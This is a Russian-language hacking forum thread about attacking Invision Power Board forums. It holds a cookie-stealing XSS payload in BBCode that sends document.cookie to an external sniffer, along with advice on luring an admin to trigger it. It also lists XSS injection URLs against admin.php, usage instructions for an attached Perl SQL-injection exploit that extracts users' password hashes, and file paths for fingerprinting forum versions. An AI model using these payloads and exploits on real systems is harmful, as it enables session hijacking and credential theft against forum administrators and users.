• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: Invision Power Board (IPB)

Отслеживать
Winux

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
XSS в IPB by White Jordan
ipb_box.jpg

Суть баги заключается во вложенных тегах. Взлом можно осуществить только в том случае если админ пользуется ослом. В мозилле и Опере баг работать не будет (т.е. на нас можно не пробовать)

Тут можно полицезреть XSS код, который необходим для взлома.

Способов устранения уязвимости пока нет. Бага присутствует во всех версиях, включая всю динейку 2.1.х
 
Это обычный XSS. Крадет Кукисы на сниффер античата. Употреби его в подписи или в посте и привлеки туда внимание админа. Потом вали на античат смотреть его кук.
 
XSS в IPB 2.1
ipb_box.jpg

Уязвимость позволяет удаленному пользователю совершать XSS комманды на машине.
Пример:
Код: 
http://localhost/2p1p0b3/upload/admin.php?adsess=[xss]&act=login&code=login-complete
http://localhost/2p1p0b3/upload/admin.php?adsess=[id]&section=content&act=forum&code=new&name=[xss]
http://localhost/2p1p0b3/upload/admin.php?name=[xss]&description=[xss]
 
XSS в IPB 2.1
ipb_box.jpg

Уязвимость позволяет удаленному пользователю совершать XSS комманды на машине.
Пример:
Код: 
http://localhost/2p1p0b3/upload/admin.php?adsess=[xss]&act=login&code=login-complete
http://localhost/2p1p0b3/upload/admin.php?adsess=[id]&section=content&act=forum&code=new&name=[xss]
http://localhost/2p1p0b3/upload/admin.php?name=[xss]&description=[xss]

Самая последняя версия 2.1.2 сам ставил, там эта ерунда не пашет!!
 
А поподробнее можно?что делает эта программа!точнее что такое XSS я думаю я не один такой кто не знает!

XSS - это технология межсайтового скриптинга!
 
А поподробнее можно?что делает эта программа!точнее что такое XSS я думаю я не один такой кто не знает!
Ну ты блин даешь...
XSS=CSS=Cross Site Scripting

Ну да, я это и сказал - межсайтовый скриптинг!
 
Догадываюсь я чтьо так не должно быть но употр**ляю это и оно просто пишется но не скрывается кстати пишу через ie да вот еще что форум версии 2.0.0 может у них теги отключены или еще что?? как вставить админ точно пользуется ie сам видел
 
XSS 2.1.9
Код: 
[IMG][COLOR=onerror='img=new/**/Image();a=String.fromCharCode(?,?,$);img.src=a+document.cookie']y[/IMG]'
 
SQL-Injection в Invision Power Board
Уязвимые версии: все
Степень опасности: высокая
Описание:
Возможен посимвольный перебор в базе данных пользователей. С чем успешно справляется эксплоит, выдавая хеш заданного пользователя.

Эксплоит: (полностью рабочий)
Прим. Great - сплоит на securitylab.ru немного корявый, поэтому я его доработал. Использовать так:
exploit.pl http://www.victim.org/path MEMBER_ID FORUM_VERSION LANGUAGE
MEMBER_ID - ид пользователя
FORUM_VERSION - 1/2 - версия форума
LANGUAGE - eng/rus - язык форума
Сплоит в процессе перебора строит график, по которому можно следить за самим процессом. (Язык форума и график - добавлено мной)
Производитель: :zns2: Invision Board
Источник: SecurityLab
 

Вложения

  • ipball.txt
    2.6 КБ · Просмотры: 730
Определение версии форума
Меня часто спрашивают: как определить версию форума, если админ снял копирайты. Если кишка тонка отличить по внешнему виду, то ответ найти легко.

1.3
присутсвует папки:
/html/emoticons/
/fonts/
/Skin/
/ssi_templates/
присутсвтуют файлы
ssi.php
show.php
css.php
conf_mime_types.php

2.0.*
Присутствуют файлы:
/sources/help.php
/sources/usercp.php
/sources/trial_functions.php
/sources/topics.php
/sources/taskloader.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: Invision Power Board -> Forbidden

2.1.*
Присутсвуют папка
/ips_kernel/PEAR/
присутствует файлы:
info.php
реагирует на 403 "доступ запрещен" например к папке
/ips_kernel/ как 403: IBForums-> Forbidden
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх